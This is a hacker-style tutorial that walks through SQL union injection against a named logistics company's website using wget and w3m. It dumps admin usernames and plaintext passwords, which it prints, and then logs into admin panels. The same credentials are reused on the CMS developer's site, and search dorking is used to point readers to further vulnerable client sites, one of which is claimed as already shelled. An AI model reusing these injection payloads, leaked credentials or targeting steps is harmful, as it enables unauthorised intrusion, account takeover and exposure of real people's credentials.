password reuse multi-pwn like an old school hacker

1. ../password_reuse_multi-pwn_like_an_old_school_hacker
2.  
3. /bit/and/cheese
4.  
5. ~/today i'll walk u through an epitome of password reuse - and how we pwn several sites with simple vulns_ anatomy of this tutorial is simple:_
6.  
7. = using only w3m + wget - because im old school & fucking cool
8. = union injection
9. = exploit password reuse
10.  
11. $ first we got a target
12.  
13. wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"
14.  
15. HTTP request sent, awaiting response...
16. HTTP/1.1 500 Internal Server Error <<< status code is true
17. Date: [n/a]
18. Server: Microsoft-IIS/6.0
19. X-Powered-By: PleskWin
20. X-Powered-By: ASP.NET
21.  
22. $ now we use w3m to confirm
23.  
24. w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less
25.  
26. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
27. [MySQL][ODBC 3.51 Driver]
28.  
29. $ vulnerable - mysql - so we need to find the version_ most mysql version has 'community' in it - so we gonna grep this (since the output was cluttered - we're gonna mark the out put with square brackets = 0x5b 0x5d)
30.  
31. w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less
32.  
33. $ next we seek for current db
34.  
35. w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less
36.  
37. $ now we dump the username and password
38.  
39. w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less
40.  
41. $ voila!_
42.  
43. user pass
44.  
45. nigel neubiberg1
46. ken na691500a
47. mark whitearrow682424
48.  
49. $ these blokes used strong pass - too bad they were in plain text!_ time to search for login page
50.  
51. wget -S --spider http://www.whitearrowlogistics.com/login/
52.  
53. wget -S --spider http://www.whitearrowlogistics.com/admin/
54.  
55. $ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)
56.  
57. w3m http://www.whitearrowlogistics.com/admin/
58.  
59. $ magic!_ now we notice a line at bottom of the admin page said >> Please contact sales@e-cc.org 'blah blah' << it mean we have found the CMS dev_ let's see if we can pwn it too - find admin page
60.  
61. wget -S --spider http://www.whitearrowlogistics.com/admin/
62.  
63. $ same page as the last target - let's try to login with the user/pass we have
64.  
65. w3m http://www.whitearrowlogistics.com/admin/
66.  
67. $ w00t!_ same pass & usr!
68.  
69. $$
70.  
71. $ let's recon the site with Bing search using site:
72.  
73. w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less
74.  
75. $ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this vuln too
76.  
77. wget -S --spider www.e-cc.org/webdesigners.asp?id=6
78.  
79. $$ it gave a 500_ responded said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' website have some kind of database errors_ i'll leave this here for you guys to pickup_
80.  
81. $ i already shelled the site - so see that as an easter egg ;-)